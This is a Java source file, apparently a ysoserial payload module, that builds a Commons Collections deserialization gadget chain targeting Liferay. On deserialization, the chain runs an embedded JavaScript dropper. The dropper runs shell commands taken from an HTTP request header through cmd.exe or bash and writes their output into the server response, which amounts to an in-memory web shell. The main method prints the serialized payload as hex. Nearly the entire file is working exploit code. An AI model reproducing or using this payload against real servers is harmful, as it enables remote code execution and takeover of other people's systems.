package ysoserial.payloads;

import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.PayloadRunner;

import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.io.PrintStream;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

@Dependencies({"commons-collections:commons-collections:3.2.1"})
@Authors({Authors.MATTHIASKAISER, Authors.JANG})
public class LiferayJsonEvalCC6 extends PayloadRunner implements ObjectPayload<Serializable> {
    public Serializable getObject(String command) throws Exception {
        String dropper = "var currentThread = com.liferay.portal.service.ServiceContextThreadLocal.getServiceContext();\n" +
            "var isWin = java.lang.System.getProperty(\"os.name\").toLowerCase().contains(\"win\");\n" +
            "var request = currentThread.getRequest();\n" +
            "var _req = org.apache.catalina.connector.RequestFacade.class.getDeclaredField(\"request\");\n" +
            "_req.setAccessible(true);\n" +
            "var realRequest = _req.get(request);\n" +
            "var response = realRequest.getResponse();\n" +
            "var outputStream = response.getOutputStream();\n" +
            "var cmd = new java.lang.String(request.getHeader(\"" + command + "\"));\n" +
            "var listCmd = new java.util.ArrayList();\n" +
            "var p = new java.lang.ProcessBuilder();\n" +
            "if(isWin){\n" +
            "    p.command(\"cmd.exe\", \"/c\", cmd);\n" +
            "}else{\n" +
            "    p.command(\"bash\", \"-c\", cmd);\n" +
            "}\n" +
            "p.redirectErrorStream(true);\n" +
            "var process = p.start();\n" +
            "var inputStreamReader = new java.io.InputStreamReader(process.getInputStream());\n" +
            "var bufferedReader = new java.io.BufferedReader(inputStreamReader);\n" +
            "var line = \"\";\n" +
            "var fullText = \"\";\n" +
            "while((line = bufferedReader.readLine()) != null){\n" +
            "    fullText = fullText + line + \"\\n\";\n" +
            "}\n" +
            "var bytes = fullText.getBytes(\"UTF-8\");\n" +
            "outputStream.write(bytes);\n" +
            "outputStream.close();\n";
        String[] execArgs = new String[]{dropper};
        Transformer[] transformers = new Transformer[]{new ConstantTransformer(javax.script.ScriptEngineManager.class),
            new InvokerTransformer("newInstance", new Class[]{},
                new Object[]{}),
            new InvokerTransformer("getEngineByName", new Class[]{String.class},
                new Object[]{"JavaScript"}),
            new InvokerTransformer("eval", new Class[]{String.class}, execArgs), new ConstantTransformer(1)};
        Transformer transformerChain = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;

        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException var18) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        f.setAccessible(true);
        HashMap innimpl = (HashMap) f.get(map);
        Field f2 = null;

        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException var17) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        f2.setAccessible(true);
        Object[] array = (Object[]) ((Object[]) f2.get(innimpl));
        Object node = array[0];
        if (node == null) {
            node = array[1];
        }

        Field keyField = null;

        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception var16) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        keyField.setAccessible(true);
        keyField.set(node, entry);
        return map;
    }

    public static void main(String[] args) throws Exception {
        PrintStream out = System.out;
        LiferayJsonEvalCC6 cc6Eval = new LiferayJsonEvalCC6();
        ObjectPayload payload = LiferayJsonEvalCC6.class.newInstance();
        Object object = cc6Eval.getObject("cmd2");
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream objOut = new ObjectOutputStream(byteArrayOutputStream);
        objOut.writeObject(object);

        String hexDmp = ByteUtils.toHexAscii(byteArrayOutputStream.toByteArray());
        System.out.println(hexDmp);

        ObjectPayload.Utils.releasePayload(payload, object);
//        PayloadRunner.run(LiferayJsonEvalCC6.class, args);
    }
}